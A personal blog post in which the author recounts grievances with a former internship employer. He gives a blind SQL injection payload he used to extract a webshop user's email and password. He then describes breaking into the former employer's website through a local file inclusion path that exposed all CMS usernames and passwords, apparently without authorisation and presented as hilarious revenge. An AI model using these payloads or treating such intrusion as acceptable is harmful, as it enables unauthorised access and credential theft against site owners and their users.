A year ago I did my orientating internship at a webdevelopment company that mainly programmed in ASP and ASP.NET. Both languages I utterly hate for their lack of clearance and flexibility. Now I had to work for them for 10 weeks which wasn't that much.. After about 7 or 8 weeks they offered me a contract which would allow me to work for them 0-10 hours a week for a quite okay payrate. I accepted.. signed the contract and we were happy. Now after 10 weeks I had to turn in my paper. Covering the 10 weeks I worked at this company. The paper was a very critic paper. And like many people do, they didn't like being judged by an 'intern'. So I could give em back the contract and I was basically fired before starting.. Well that's not completely true.. I worked 10 hours for them and I didn't get paid. Evil.
Anyway to get to the point.. They recently delivered a webshop actually written in PHP. So I had to test it for holes.. And yes! sql injection, except that this one was a little tricky.. I always got an 'OK' Message. I had to find a way around this. I tried the following thing:
id=246 AND IF(1=(SELECT CHAR_LENGTH(pass) FROM users LIMIT 0,1),1,(SELECT 1 UNION SELECT 2))
Basically what this query did was if the length matched the first password I would get a normal page. If the lenght didn't match it would give me the error: Subquery returned more then 1 row.
So an exploit was in place and soon I had the first user's email and password. Now the funny part was that this first user I suspect being the one written the webshop. He works at a different company I ran my internship. It appears that this other company is in the same building where I work now.. funny.
Anyway there's nothing more hilarious than trying to hack the website of the company where I did my orientating internship. Before actually going into this I have to tell you one of the things I disliked a lot from this company. They didn't use any databases.. they used... XML files! for everything.. really! I mean.. come..onnnnnn...
Ok, Now back to their website. It didn't take me long for this one.. Now since they use a lot of xml files, there's no way of injecting sql. A different approach was needed. Local File Inclusion..
page.asp?inc=cgi-bin/xmldocs/b_users.xml
The above statement gave me all the usernames and passwords for their content management system..
All their passwords were the same.. Another point of this critic!
Subscribe to:
Post Comments (Atom)
lol :)
ReplyDelete